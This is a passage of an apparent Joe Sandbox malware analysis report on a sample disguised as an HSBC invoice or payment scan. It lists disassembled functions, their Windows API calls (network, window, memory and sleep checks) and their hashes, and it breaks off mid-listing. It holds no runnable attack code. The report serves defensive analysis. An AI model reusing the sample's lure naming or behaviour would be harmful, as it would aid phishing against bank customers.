                    • ReleaseDC.USER32(?), ref: 00EC21D2
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: CapsDesktopDeviceReleaseWindow
                    • String ID:
                    • API String ID: 2889604237-0
                    • Opcode ID: 5959a4aa24b7667b0c74201ffb44d47f87345a3da5bf693a1e2fbd486a5d2642
                    • Instruction ID: 77c468a5847aaeae54e28ba67f2c7831720ffb6ed14101b0539867670df82430
                    • Opcode Fuzzy Hash: 5959a4aa24b7667b0c74201ffb44d47f87345a3da5bf693a1e2fbd486a5d2642
                    • Instruction Fuzzy Hash: 3EE01A75800608EFDB51AFB0C808BAD7BF1FB4C350F108429F95AE7620CB3A9146AF40
                    Function 00EC219B Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                    Download Yara Rule
                    APIs
                    • GetDesktopWindow.USER32 ref: 00EC219B
                    • GetDC.USER32(00000000), ref: 00EC21A5
                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00EC21B1
                    • ReleaseDC.USER32(?), ref: 00EC21D2
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: CapsDesktopDeviceReleaseWindow
                    • String ID:
                    • API String ID: 2889604237-0
                    • Opcode ID: e65963737b52aad4371de162e575b01345278acd5dca64080ce9cb220b181ac0
                    • Instruction ID: ef13efeadada6baa45df78f5037ded7438194431aa058971084bd85ec58c52ca
                    • Opcode Fuzzy Hash: e65963737b52aad4371de162e575b01345278acd5dca64080ce9cb220b181ac0
                    • Instruction Fuzzy Hash: 33E012B5800608AFCB61AFB0C8086AD7BF1FB4C310F108029F95EE7620CB3A9145AF40
                    Function 00EF9A72 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 242COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00ED7652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00ED758C,80070057,?,?), ref: 00ED7698
                    • _memset.LIBCMT ref: 00EF9B28
                    • _memset.LIBCMT ref: 00EF9C6B
                    Strings
                    • NULL Pointer assignment, xrefs: 00EF9CF0
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: _memset$lstrcmpi
                    • String ID: NULL Pointer assignment
                    • API String ID: 1020867613-2785691316
                    • Opcode ID: edcfcca30b2c2c58b7e1aa15d9d2dde4d4dee66552cea583b60510dfaf2f219b
                    • Instruction ID: 18a826a68197050101f52dde879417dc89d430ecae61646dcde0543d5f8ebf2b
                    • Opcode Fuzzy Hash: edcfcca30b2c2c58b7e1aa15d9d2dde4d4dee66552cea583b60510dfaf2f219b
                    • Instruction Fuzzy Hash: 0E913871D0021DABDB10DFA5DC84AEEBBB8AF08710F20515AF559B7281DB319A45CFA0
                    Function 00EDB7B6 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON
                    Download Yara Rule
                    APIs
                    • OleSetContainedObject.OLE32(?,00000001), ref: 00EDB981
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ContainedObject
                    • String ID: AutoIt3GUI$Container
                    • API String ID: 3565006973-3941886329
                    • Opcode ID: 58aa82de616d1b191478606dbd9384324ccdd2bf2f83589fb763174431477252
                    • Instruction ID: a5dc764df59942174fab0c5500b03436b592ef83394607838a31d05da5307091
                    • Opcode Fuzzy Hash: 58aa82de616d1b191478606dbd9384324ccdd2bf2f83589fb763174431477252
                    • Instruction Fuzzy Hash: 86915A74600201DFDB24CF64C884A6ABBE8FF49710F15956EF94AEB791EBB0E841CB50
                    Function 00EEB217 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E9FEC6: _wcscpy.LIBCMT ref: 00E9FEE9
                      • Part of subcall function 00E89997: __itow.LIBCMT ref: 00E899C2
                      • Part of subcall function 00E89997: __swprintf.LIBCMT ref: 00E89A0C
                    • __wcsnicmp.LIBCMT ref: 00EEB298
                    • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00EEB361
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                    • String ID: LPT
                    • API String ID: 3222508074-1350329615
                    • Opcode ID: 0ce238c8e5a977db4ea16c7945450b2bd869b52041ddb37860afe90d29ba762e
                    • Instruction ID: 5d94b78c467286b09d90488521dff42df67e965493703c1244184d7ee8531830
                    • Opcode Fuzzy Hash: 0ce238c8e5a977db4ea16c7945450b2bd869b52041ddb37860afe90d29ba762e
                    • Instruction Fuzzy Hash: 73617175E00219AFCB14EF95C882EAEB7F4EF48310F15506AF54ABB291DB70AE40CB51
                    Function 00EC8A77 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID: Oa
                    • API String ID: 4104443479-3945284152
                    • Opcode ID: 5c57662299954293e01341a0eb6a689f3b5d9126a54e4216f67ac50917b3e913
                    • Instruction ID: eb68414843b8b9b1964fb5aa2b2c337a8741862d1fca662cc880ec06e76ac8bc
                    • Opcode Fuzzy Hash: 5c57662299954293e01341a0eb6a689f3b5d9126a54e4216f67ac50917b3e913
                    • Instruction Fuzzy Hash: F45130B49006099FCF64CF68C680AAEB7F1FF44318F14552EE85AE7250EB31AD56CB51
                    Function 00E92AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                    Download Yara Rule
                    APIs
                    • Sleep.KERNEL32(00000000), ref: 00E92AC8
                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 00E92AE1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: GlobalMemorySleepStatus
                    • String ID: @
                    • API String ID: 2783356886-2766056989
                    • Opcode ID: beecb776050d9a6afcc11ba82a9999fde2a72ac70ef7beb4be5cd62c60033e17
                    • Instruction ID: aeca2ee04c78effefe43b0801468c075133f254276cfb9b47bc47533760b8a0c
                    • Opcode Fuzzy Hash: beecb776050d9a6afcc11ba82a9999fde2a72ac70ef7beb4be5cd62c60033e17
                    • Instruction Fuzzy Hash: 9E5158718187489BD320BF50D886BAFBBE8FF84314F56485DF1DD510A2DB709929CB16
                    Function 00EE99BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E8506B: __fread_nolock.LIBCMT ref: 00E85089
                    • _wcscmp.LIBCMT ref: 00EE9AAE
                    • _wcscmp.LIBCMT ref: 00EE9AC1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: _wcscmp$__fread_nolock
                    • String ID: FILE
                    • API String ID: 4029003684-3121273764
                    • Opcode ID: d158019799a0179a09110f9d9c012ded9d4bc579da9f71b6e74ab4ce50e7a410
                    • Instruction ID: 13c6d88903cd0a3b3a20490dfea66d37967d3eebb2eb2851191a8fd1f1cfd48a
                    • Opcode Fuzzy Hash: d158019799a0179a09110f9d9c012ded9d4bc579da9f71b6e74ab4ce50e7a410
                    • Instruction Fuzzy Hash: C741D672A00649BADF20AAA5DC45FEFBBFDDF49714F00007AB904F7181DA75AA0487A1
                    Function 00EF2882 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00EF2892
                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00EF28C8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: CrackInternet_memset
                    • String ID: |
                    • API String ID: 1413715105-2343686810
                    • Opcode ID: 9c9e407e4e0fbd861c242b44dfe95ce985ef6aa11f9ccd70a7af2abce5747215
                    • Instruction ID: 83c06f81c5345cc9385d7bb75d29a101da5c6b5128b35e8e07c6310eb10c9c4a
                    • Opcode Fuzzy Hash: 9c9e407e4e0fbd861c242b44dfe95ce985ef6aa11f9ccd70a7af2abce5747215
                    • Instruction Fuzzy Hash: 8B311971800119AFCF15AFA1CC85EEEBFB9FF08300F105069F959B6166DB319A56DBA0
                    Function 00F06CD2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                    Download Yara Rule
                    APIs
                    • DestroyWindow.USER32(?,?,?,?), ref: 00F06D86
                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00F06DC2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Window$DestroyMove
                    • String ID: static
                    • API String ID: 2139405536-2160076837
                    • Opcode ID: e712ba1a90626994519710ffdae35bf817bb2b7314349f99f9a80d8369705705
                    • Instruction ID: e1c6b3f2accb04a5a0d85a1727f83b4983507e4b9a791499e5b1f3638246d631
                    • Opcode Fuzzy Hash: e712ba1a90626994519710ffdae35bf817bb2b7314349f99f9a80d8369705705
                    • Instruction Fuzzy Hash: 9A318F71610604AEEB109F64CC80BFB77B9FF48724F109619F9AAD7190DB35AC91EB60
                    Function 00EE2D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00EE2E00
                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00EE2E3B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: InfoItemMenu_memset
                    • String ID: 0
                    • API String ID: 2223754486-4108050209
                    • Opcode ID: 33bf7fc900febcae0a89f8a4f9cfdd7ba68eab90f16d78216feb8602d98596ef
                    • Instruction ID: b662122b55ab7eb96d7080e6607f686acee392371d29d4f2878298eb6f27b56d
                    • Opcode Fuzzy Hash: 33bf7fc900febcae0a89f8a4f9cfdd7ba68eab90f16d78216feb8602d98596ef
                    • Instruction Fuzzy Hash: EA31273160035DABEB268F5AD8847AEBBFDFF05354F14106DEA81B61B0D7709940CB10
                    Function 00F06943 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00F069D0
                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F069DB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID: Combobox
                    • API String ID: 3850602802-2096851135
                    • Opcode ID: 74f82c9e0b460ee36268822b5eb3146255a4db180e7942e3bec188c6e1f1cf00
                    • Instruction ID: 0f8857c50993ec1c5245e78c74e565151544931df2cad9fbb3ddca2b7695e11e
                    • Opcode Fuzzy Hash: 74f82c9e0b460ee36268822b5eb3146255a4db180e7942e3bec188c6e1f1cf00
                    • Instruction Fuzzy Hash: A611B271B00208AFEF219F14CC90EAB37AAEB993A4F114124F958D72E0D6759C61B7A0
                    Function 00F06E76 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E81D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E81D73
                      • Part of subcall function 00E81D35: GetStockObject.GDI32(00000011), ref: 00E81D87
                      • Part of subcall function 00E81D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E81D91
                    • GetWindowRect.USER32(00000000,?), ref: 00F06EE0
                    • GetSysColor.USER32(00000012), ref: 00F06EFA
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                    • String ID: static
                    • API String ID: 1983116058-2160076837
                    • Opcode ID: 1d54f287f626d3e6895483251d7eeac53e0a364263f222633bdec90fd314bf15
                    • Instruction ID: 54d47c454b28b71431f7c9f5e53a068684329fc2b00dfe6f2daaff23397fc71a
                    • Opcode Fuzzy Hash: 1d54f287f626d3e6895483251d7eeac53e0a364263f222633bdec90fd314bf15
                    • Instruction Fuzzy Hash: AA215972A1020AAFDB04DFA8CC45AFA7BB8FB08315F004628FD55D3290E734E861AB50
                    Function 00F06B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetWindowTextLengthW.USER32(00000000), ref: 00F06C11
                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00F06C20
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: LengthMessageSendTextWindow
                    • String ID: edit
                    • API String ID: 2978978980-2167791130
                    • Opcode ID: 65c569085c3fa094f9539c559347e772d8dc05b3cae283b38660a7867bc51240
                    • Instruction ID: fd3ebeae73eea4e4f925258a866e0b17b991d23423dfb5db5e0b8bc6ef000d34
                    • Opcode Fuzzy Hash: 65c569085c3fa094f9539c559347e772d8dc05b3cae283b38660a7867bc51240
                    • Instruction Fuzzy Hash: A111BCB1900208ABEB209E64DC41EFB37AAEB45378F604724F965D71E0C775DCA1BB60
                    Function 00EE2E9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00EE2F11
                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00EE2F30
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: InfoItemMenu_memset
                    • String ID: 0
                    • API String ID: 2223754486-4108050209
                    • Opcode ID: 94294c85f6b70a5f5d1752a61eeca6c6f4e3b7b763ed0bdbd750d14b276b96b7
                    • Instruction ID: c4b10ad28f7740363b8de4cac208e423227b817a890b9f0c20f1f7657af91fbc
                    • Opcode Fuzzy Hash: 94294c85f6b70a5f5d1752a61eeca6c6f4e3b7b763ed0bdbd750d14b276b96b7
                    • Instruction Fuzzy Hash: 1311B131E0126CABDB35DE99DC44B9D77BDAB16318F0810A9EE44B72A0D770AD04D791
                    Function 00EF24CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                    Download Yara Rule
                    APIs
                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00EF2520
                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00EF2549
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
